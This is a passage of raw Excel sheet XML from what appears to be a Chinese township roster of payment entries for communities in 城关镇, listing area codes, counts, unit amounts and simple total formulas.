      <c r="C725" s="24" t="str">
        <f>C724</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D725" s="37" t="s">
        <v>1958</v>
      </c>
      <c r="E725" s="31" t="s">
        <v>320</v>
      </c>
      <c r="F725" s="24" t="str">
        <f>F724</f>
        <v>4113210108</v>
      </c>
      <c r="G725" s="24"/>
      <c r="H725" s="24"/>
      <c r="I725" s="24">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="J725" s="24"/>
      <c r="K725" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="726" customHeight="1" spans="1:11">
      <c r="A726" s="23" t="s">
        <v>1959</v>
      </c>
      <c r="B726" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C726" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D726" s="24" t="s">
        <v>1960</v>
      </c>
      <c r="E726" s="24" t="s">
        <v>1250</v>
      </c>
      <c r="F726" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G726" s="24">
        <v>2</v>
      </c>
      <c r="H726" s="25">
        <v>345</v>
      </c>
      <c r="I726" s="24">
        <f t="shared" si="11"/>
        <v>690</v>
      </c>
      <c r="J726" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K726" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="727" customHeight="1" spans="1:11">
      <c r="A727" s="23" t="s">
        <v>1961</v>
      </c>
      <c r="B727" s="24" t="str">
        <f>B726</f>
        <v>城关镇</v>
      </c>
      <c r="C727" s="24" t="str">
        <f>C726</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D727" s="37" t="s">
        <v>1962</v>
      </c>
      <c r="E727" s="23" t="s">
        <v>1963</v>
      </c>
      <c r="F727" s="24" t="str">
        <f>F726</f>
        <v>4113210108</v>
      </c>
      <c r="G727" s="24"/>
      <c r="H727" s="24"/>
      <c r="I727" s="24">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="J727" s="24"/>
      <c r="K727" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="728" customHeight="1" spans="1:11">
      <c r="A728" s="23" t="s">
        <v>1964</v>
      </c>
      <c r="B728" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C728" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D728" s="24" t="s">
        <v>1965</v>
      </c>
      <c r="E728" s="24" t="s">
        <v>1966</v>
      </c>
      <c r="F728" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G728" s="24">
        <v>1</v>
      </c>
      <c r="H728" s="25">
        <v>365</v>
      </c>
      <c r="I728" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J728" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K728" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="729" customHeight="1" spans="1:11">
      <c r="A729" s="23" t="s">
        <v>1967</v>
      </c>
      <c r="B729" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C729" s="24" t="s">
        <v>1968</v>
      </c>
      <c r="D729" s="24" t="s">
        <v>1969</v>
      </c>
      <c r="E729" s="24" t="s">
        <v>1214</v>
      </c>
      <c r="F729" s="24" t="s">
        <v>1970</v>
      </c>
      <c r="G729" s="24">
        <v>1</v>
      </c>
      <c r="H729" s="25">
        <v>365</v>
      </c>
      <c r="I729" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J729" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K729" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="730" customHeight="1" spans="1:11">
      <c r="A730" s="23" t="s">
        <v>1971</v>
      </c>
      <c r="B730" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C730" s="24" t="s">
        <v>219</v>
      </c>
      <c r="D730" s="24" t="s">
        <v>1972</v>
      </c>
      <c r="E730" s="24" t="s">
        <v>239</v>
      </c>
      <c r="F730" s="24" t="s">
        <v>1203</v>
      </c>
      <c r="G730" s="24">
        <v>1</v>
      </c>
      <c r="H730" s="25">
        <v>365</v>
      </c>
      <c r="I730" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J730" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K730" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="731" customHeight="1" spans="1:11">
      <c r="A731" s="23" t="s">
        <v>1973</v>
      </c>
      <c r="B731" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C731" s="24" t="s">
        <v>1974</v>
      </c>
      <c r="D731" s="24" t="s">
        <v>1975</v>
      </c>
      <c r="E731" s="24" t="s">
        <v>284</v>
      </c>
      <c r="F731" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G731" s="24">
        <v>1</v>
      </c>
      <c r="H731" s="25">
        <v>365</v>
      </c>
      <c r="I731" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J731" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K731" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="732" customHeight="1" spans="1:11">
      <c r="A732" s="23" t="s">
        <v>1976</v>
      </c>
      <c r="B732" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C732" s="24" t="s">
        <v>1974</v>
      </c>
      <c r="D732" s="24" t="s">
        <v>1977</v>
      </c>
      <c r="E732" s="24" t="s">
        <v>360</v>
      </c>
      <c r="F732" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G732" s="24">
        <v>1</v>
      </c>
      <c r="H732" s="25">
        <v>365</v>
      </c>
      <c r="I732" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J732" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K732" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="733" customHeight="1" spans="1:11">
      <c r="A733" s="23" t="s">
        <v>1978</v>
      </c>
      <c r="B733" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C733" s="24" t="s">
        <v>1979</v>
      </c>
      <c r="D733" s="24" t="s">
        <v>1980</v>
      </c>
      <c r="E733" s="24" t="s">
        <v>1981</v>
      </c>
      <c r="F733" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G733" s="24">
        <v>2</v>
      </c>
      <c r="H733" s="25">
        <v>325</v>
      </c>
      <c r="I733" s="24">
        <f t="shared" si="11"/>
        <v>650</v>
      </c>
      <c r="J733" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K733" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="734" customHeight="1" spans="1:11">
      <c r="A734" s="23" t="s">
        <v>1982</v>
      </c>
      <c r="B734" s="24" t="str">
        <f>B733</f>
        <v>城关镇</v>
      </c>
      <c r="C734" s="24" t="str">
        <f>C733</f>
        <v>中华社区九组</v>
      </c>
      <c r="D734" s="30" t="s">
        <v>1983</v>
      </c>
      <c r="E734" s="30" t="s">
        <v>1984</v>
      </c>
      <c r="F734" s="24" t="str">
        <f>F733</f>
        <v>4113210108</v>
      </c>
      <c r="G734" s="24"/>
      <c r="H734" s="24"/>
      <c r="I734" s="24">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="J734" s="24"/>
      <c r="K734" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="735" customHeight="1" spans="1:11">
      <c r="A735" s="23" t="s">
        <v>1985</v>
      </c>
      <c r="B735" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C735" s="24" t="s">
        <v>1986</v>
      </c>
      <c r="D735" s="24" t="s">
        <v>1987</v>
      </c>
      <c r="E735" s="24" t="s">
        <v>346</v>
      </c>
      <c r="F735" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G735" s="24">
        <v>1</v>
      </c>
      <c r="H735" s="25">
        <v>365</v>
      </c>
      <c r="I735" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J735" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K735" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="736" customHeight="1" spans="1:11">
      <c r="A736" s="23" t="s">
        <v>1988</v>
      </c>
      <c r="B736" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C736" s="24" t="s">
        <v>1989</v>
      </c>
      <c r="D736" s="24" t="s">
        <v>1990</v>
      </c>
      <c r="E736" s="24" t="s">
        <v>561</v>
      </c>
      <c r="F736" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G736" s="24">
        <v>1</v>
      </c>
      <c r="H736" s="25">
        <v>365</v>
      </c>
      <c r="I736" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J736" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K736" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="737" customHeight="1" spans="1:11">
      <c r="A737" s="23" t="s">
        <v>1991</v>
      </c>
      <c r="B737" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C737" s="24" t="s">
        <v>1989</v>
      </c>
      <c r="D737" s="24" t="s">
        <v>1992</v>
      </c>
      <c r="E737" s="24" t="s">
        <v>1993</v>
      </c>
      <c r="F737" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G737" s="24">
        <v>1</v>
      </c>
      <c r="H737" s="25">
        <v>365</v>
      </c>
      <c r="I737" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J737" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K737" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="738" customHeight="1" spans="1:11">
      <c r="A738" s="23" t="s">
        <v>1994</v>
      </c>
      <c r="B738" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C738" s="24" t="s">
        <v>1986</v>
      </c>
      <c r="D738" s="24" t="s">
        <v>1995</v>
      </c>
      <c r="E738" s="24" t="s">
        <v>606</v>
      </c>
      <c r="F738" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G738" s="24">
        <v>1</v>
      </c>
      <c r="H738" s="25">
        <v>365</v>
      </c>
      <c r="I738" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J738" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K738" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="739" customHeight="1" spans="1:11">
      <c r="A739" s="23" t="s">
        <v>1996</v>
      </c>
      <c r="B739" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C739" s="24" t="s">
        <v>1989</v>
      </c>
      <c r="D739" s="24" t="s">
        <v>1997</v>
      </c>
      <c r="E739" s="24" t="s">
        <v>1998</v>
      </c>
      <c r="F739" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G739" s="24">
        <v>1</v>
      </c>
      <c r="H739" s="25">
        <v>365</v>
      </c>
      <c r="I739" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J739" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K739" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="740" customHeight="1" spans="1:11">
      <c r="A740" s="23" t="s">
        <v>1999</v>
      </c>
      <c r="B740" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C740" s="24" t="s">
        <v>2000</v>
      </c>
      <c r="D740" s="24" t="s">
        <v>2001</v>
      </c>
      <c r="E740" s="24" t="s">
        <v>2002</v>
      </c>
      <c r="F740" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G740" s="24">
        <v>1</v>
      </c>
      <c r="H740" s="25">
        <v>365</v>
      </c>
      <c r="I740" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J740" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K740" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="741" customHeight="1" spans="1:11">
      <c r="A741" s="23" t="s">
        <v>2003</v>
      </c>
      <c r="B741" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C741" s="24" t="s">
        <v>2004</v>
      </c>
      <c r="D741" s="24" t="s">
        <v>2005</v>
      </c>
      <c r="E741" s="24" t="s">
        <v>2006</v>
      </c>
      <c r="F741" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G741" s="24">
        <v>1</v>
      </c>
      <c r="H741" s="25">
        <v>365</v>
      </c>
      <c r="I741" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J741" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K741" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="742" customHeight="1" spans="1:11">
      <c r="A742" s="23" t="s">
        <v>2007</v>
      </c>
      <c r="B742" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C742" s="24" t="s">
        <v>318</v>
      </c>
      <c r="D742" s="24" t="s">
        <v>2008</v>
      </c>
      <c r="E742" s="24" t="s">
        <v>479</v>
      </c>
      <c r="F742" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G742" s="24">
        <v>1</v>
      </c>
      <c r="H742" s="25">
        <v>365</v>
      </c>
      <c r="I742" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J742" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K742" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="743" customHeight="1" spans="1:11">
      <c r="A743" s="23" t="s">
        <v>2009</v>
      </c>
      <c r="B743" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C743" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D743" s="24" t="s">
        <v>2010</v>
      </c>
      <c r="E743" s="24" t="s">
        <v>2011</v>
      </c>
      <c r="F743" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G743" s="24">
        <v>1</v>
      </c>
      <c r="H743" s="25">
        <v>365</v>
      </c>
      <c r="I743" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J743" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K743" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="744" customHeight="1" spans="1:11">
      <c r="A744" s="23" t="s">
        <v>2012</v>
      </c>
      <c r="B744" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C744" s="24" t="s">
        <v>318</v>
      </c>
      <c r="D744" s="24" t="s">
        <v>2013</v>
      </c>
      <c r="E744" s="24" t="s">
        <v>2014</v>
      </c>
      <c r="F744" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G744" s="24">
        <v>1</v>
      </c>
      <c r="H744" s="25">
        <v>365</v>
      </c>
      <c r="I744" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J744" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K744" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="745" customHeight="1" spans="1:11">
      <c r="A745" s="23" t="s">
        <v>2015</v>
      </c>
      <c r="B745" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C745" s="24" t="s">
        <v>2016</v>
      </c>
      <c r="D745" s="24" t="s">
        <v>2017</v>
      </c>
      <c r="E745" s="24" t="s">
        <v>370</v>
      </c>
      <c r="F745" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G745" s="24">
        <v>1</v>
      </c>
      <c r="H745" s="25">
        <v>365</v>
      </c>
      <c r="I745" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J745" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K745" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="746" customHeight="1" spans="1:11">
      <c r="A746" s="23" t="s">
        <v>2018</v>
      </c>
      <c r="B746" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C746" s="24" t="s">
        <v>2019</v>
      </c>
      <c r="D746" s="24" t="s">
        <v>2020</v>
      </c>
      <c r="E746" s="24" t="s">
        <v>288</v>
      </c>
      <c r="F746" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G746" s="24">
        <v>1</v>
      </c>
      <c r="H746" s="25">
        <v>365</v>
      </c>
      <c r="I746" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J746" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K746" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="747" customHeight="1" spans="1:11">
      <c r="A747" s="23" t="s">
        <v>2021</v>
      </c>
      <c r="B747" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C747" s="24" t="s">
        <v>2019</v>
      </c>
      <c r="D747" s="24" t="s">
        <v>2022</v>
      </c>
      <c r="E747" s="24" t="s">
        <v>242</v>
      </c>
      <c r="F747" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G747" s="24">
        <v>2</v>
      </c>
      <c r="H747" s="25">
        <v>325</v>
      </c>
      <c r="I747" s="24">
        <f t="shared" si="11"/>
        <v>650</v>
      </c>
      <c r="J747" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K747" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="748" customHeight="1" spans="1:11">
      <c r="A748" s="23" t="s">
        <v>2023</v>
      </c>
      <c r="B748" s="24" t="str">
        <f>B747</f>
        <v>城关镇</v>
      </c>
      <c r="C748" s="24" t="str">
        <f>C747</f>
        <v>城关镇中华社区</v>
      </c>
      <c r="D748" s="37" t="s">
        <v>2024</v>
      </c>
      <c r="E748" s="31" t="s">
        <v>292</v>
      </c>
      <c r="F748" s="24" t="str">
        <f>F747</f>
        <v>4113210108</v>
      </c>
      <c r="G748" s="24"/>
      <c r="H748" s="24"/>
      <c r="I748" s="24">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="J748" s="24"/>
      <c r="K748" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="749" customHeight="1" spans="1:11">
      <c r="A749" s="23" t="s">
        <v>2025</v>
      </c>
      <c r="B749" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C749" s="24" t="s">
        <v>2026</v>
      </c>
      <c r="D749" s="24" t="s">
        <v>2027</v>
      </c>
      <c r="E749" s="24" t="s">
        <v>249</v>
      </c>
      <c r="F749" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G749" s="24">
        <v>1</v>
      </c>
      <c r="H749" s="25">
        <v>365</v>
      </c>
      <c r="I749" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J749" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K749" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="750" customHeight="1" spans="1:11">
      <c r="A750" s="23" t="s">
        <v>2028</v>
      </c>
      <c r="B750" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C750" s="24" t="s">
        <v>2029</v>
      </c>
      <c r="D750" s="24" t="s">
        <v>2030</v>
      </c>
      <c r="E750" s="24" t="s">
        <v>261</v>
      </c>
      <c r="F750" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G750" s="24">
        <v>1</v>
      </c>
      <c r="H750" s="25">
        <v>365</v>
      </c>
      <c r="I750" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J750" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K750" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="751" customHeight="1" spans="1:11">
      <c r="A751" s="23" t="s">
        <v>2031</v>
      </c>
      <c r="B751" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C751" s="24" t="s">
        <v>2032</v>
      </c>
      <c r="D751" s="24" t="s">
        <v>2033</v>
      </c>
      <c r="E751" s="24" t="s">
        <v>340</v>
      </c>
      <c r="F751" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G751" s="24">
        <v>1</v>
      </c>
      <c r="H751" s="25">
        <v>365</v>
      </c>
      <c r="I751" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J751" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K751" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="752" customHeight="1" spans="1:11">
      <c r="A752" s="23" t="s">
        <v>2034</v>
      </c>
      <c r="B752" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C752" s="24" t="s">
        <v>2035</v>
      </c>
      <c r="D752" s="24" t="s">
        <v>2036</v>
      </c>
      <c r="E752" s="24" t="s">
        <v>249</v>
      </c>
      <c r="F752" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G752" s="24">
        <v>1</v>
      </c>
      <c r="H752" s="25">
        <v>365</v>
      </c>
      <c r="I752" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J752" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K752" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="753" customHeight="1" spans="1:12">
      <c r="A753" s="23" t="s">
        <v>2037</v>
      </c>
      <c r="B753" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C753" s="24" t="s">
        <v>2035</v>
      </c>
      <c r="D753" s="24" t="s">
        <v>2038</v>
      </c>
      <c r="E753" s="24" t="s">
        <v>397</v>
      </c>
      <c r="F753" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G753" s="24">
        <v>1</v>
      </c>
      <c r="H753" s="25">
        <v>365</v>
      </c>
      <c r="I753" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J753" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K753" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="754" customHeight="1" spans="1:12">
      <c r="A754" s="23" t="s">
        <v>2039</v>
      </c>
      <c r="B754" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C754" s="24" t="s">
        <v>1674</v>
      </c>
      <c r="D754" s="24" t="s">
        <v>2040</v>
      </c>
      <c r="E754" s="24" t="s">
        <v>1065</v>
      </c>
      <c r="F754" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G754" s="24">
        <v>1</v>
      </c>
      <c r="H754" s="25">
        <v>365</v>
      </c>
      <c r="I754" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J754" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K754" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="755" customHeight="1" spans="1:12">
      <c r="A755" s="23" t="s">
        <v>2041</v>
      </c>
      <c r="B755" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C755" s="24" t="s">
        <v>1674</v>
      </c>
      <c r="D755" s="24" t="s">
        <v>2042</v>
      </c>
      <c r="E755" s="24" t="s">
        <v>252</v>
      </c>
      <c r="F755" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G755" s="24">
        <v>2</v>
      </c>
      <c r="H755" s="25">
        <v>325</v>
      </c>
      <c r="I755" s="24">
        <f t="shared" si="11"/>
        <v>650</v>
      </c>
      <c r="J755" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K755" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="756" customHeight="1" spans="1:12">
      <c r="A756" s="23" t="s">
        <v>2043</v>
      </c>
      <c r="B756" s="24" t="str">
        <f>B755</f>
        <v>城关镇</v>
      </c>
      <c r="C756" s="24" t="str">
        <f>C755</f>
        <v>北外社区</v>
      </c>
      <c r="D756" s="37" t="s">
        <v>2044</v>
      </c>
      <c r="E756" s="31" t="s">
        <v>1770</v>
      </c>
      <c r="F756" s="24" t="str">
        <f>F755</f>
        <v>4113210102</v>
      </c>
      <c r="G756" s="24"/>
      <c r="H756" s="24"/>
      <c r="I756" s="24">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="J756" s="24"/>
      <c r="K756" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="757" customHeight="1" spans="1:12">
      <c r="A757" s="23" t="s">
        <v>2045</v>
      </c>
      <c r="B757" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C757" s="24" t="s">
        <v>1841</v>
      </c>
      <c r="D757" s="24" t="s">
        <v>2046</v>
      </c>
      <c r="E757" s="24" t="s">
        <v>331</v>
      </c>
      <c r="F757" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G757" s="24">
        <v>1</v>
      </c>
      <c r="H757" s="25">
        <v>365</v>
      </c>
      <c r="I757" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J757" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K757" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="758" customHeight="1" spans="1:12">
      <c r="A758" s="23" t="s">
        <v>2047</v>
      </c>
      <c r="B758" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C758" s="24" t="s">
        <v>1683</v>
      </c>
      <c r="D758" s="24" t="s">
        <v>2048</v>
      </c>
      <c r="E758" s="24" t="s">
        <v>2049</v>
      </c>
      <c r="F758" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G758" s="24">
        <v>1</v>
      </c>
      <c r="H758" s="25">
        <v>365</v>
      </c>
      <c r="I758" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J758" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K758" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="759" customHeight="1" spans="1:12">
      <c r="A759" s="23" t="s">
        <v>2050</v>
      </c>
      <c r="B759" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C759" s="24" t="s">
        <v>2051</v>
      </c>
      <c r="D759" s="24" t="s">
        <v>2052</v>
      </c>
      <c r="E759" s="24" t="s">
        <v>2053</v>
      </c>
      <c r="F759" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G759" s="24">
        <v>2</v>
      </c>
      <c r="H759" s="25">
        <v>325</v>
      </c>
      <c r="I759" s="24">
        <f t="shared" si="11"/>
        <v>650</v>
      </c>
      <c r="J759" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K759" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="760" customHeight="1" spans="1:12">
      <c r="A760" s="23" t="s">
        <v>2054</v>
      </c>
      <c r="B760" s="24" t="str">
        <f>B759</f>
        <v>城关镇</v>
      </c>
      <c r="C760" s="24" t="str">
        <f>C759</f>
        <v>西北社区</v>
      </c>
      <c r="D760" s="30" t="s">
        <v>2055</v>
      </c>
      <c r="E760" s="30" t="s">
        <v>2056</v>
      </c>
      <c r="F760" s="24" t="str">
        <f>F759</f>
        <v>4113210106</v>
      </c>
      <c r="G760" s="24"/>
      <c r="H760" s="24"/>
      <c r="I760" s="24">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="J760" s="24"/>
      <c r="K760" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="761" customHeight="1" spans="1:12">
      <c r="A761" s="23" t="s">
        <v>2057</v>
      </c>
      <c r="B761" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C761" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D761" s="24" t="s">
        <v>2058</v>
      </c>
      <c r="E761" s="24" t="s">
        <v>303</v>
      </c>
      <c r="F761" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G761" s="24">
        <v>1</v>
      </c>
      <c r="H761" s="25">
        <v>365</v>
      </c>
      <c r="I761" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J761" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K761" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="762" customHeight="1" spans="1:12">
      <c r="A762" s="23" t="s">
        <v>2059</v>
      </c>
      <c r="B762" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C762" s="24" t="s">
        <v>247</v>
      </c>
      <c r="D762" s="24" t="s">
        <v>2060</v>
      </c>
      <c r="E762" s="24" t="s">
        <v>1866</v>
      </c>
      <c r="F762" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G762" s="24">
        <v>1</v>
      </c>
      <c r="H762" s="25">
        <v>365</v>
      </c>
      <c r="I762" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J762" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K762" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="763" customHeight="1" spans="1:12">
      <c r="A763" s="23" t="s">
        <v>2061</v>
      </c>
      <c r="B763" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C763" s="24" t="s">
        <v>1778</v>
      </c>
      <c r="D763" s="24" t="s">
        <v>2062</v>
      </c>
      <c r="E763" s="24" t="s">
        <v>306</v>
      </c>
      <c r="F763" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G763" s="24">
        <v>1</v>
      </c>
      <c r="H763" s="25">
        <v>365</v>
      </c>
      <c r="I763" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J763" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K763" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="764" customHeight="1" spans="1:12">
      <c r="A764" s="23" t="s">
        <v>2063</v>
      </c>
      <c r="B764" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C764" s="24" t="s">
        <v>2051</v>
      </c>
      <c r="D764" s="24" t="s">
        <v>2064</v>
      </c>
      <c r="E764" s="24" t="s">
        <v>346</v>
      </c>
      <c r="F764" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G764" s="24">
        <v>1</v>
      </c>
      <c r="H764" s="25">
        <v>365</v>
      </c>
      <c r="I764" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J764" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K764" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="765" customHeight="1" spans="1:12">
      <c r="A765" s="23" t="s">
        <v>2065</v>
      </c>
      <c r="B765" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C765" s="24" t="s">
        <v>2032</v>
      </c>
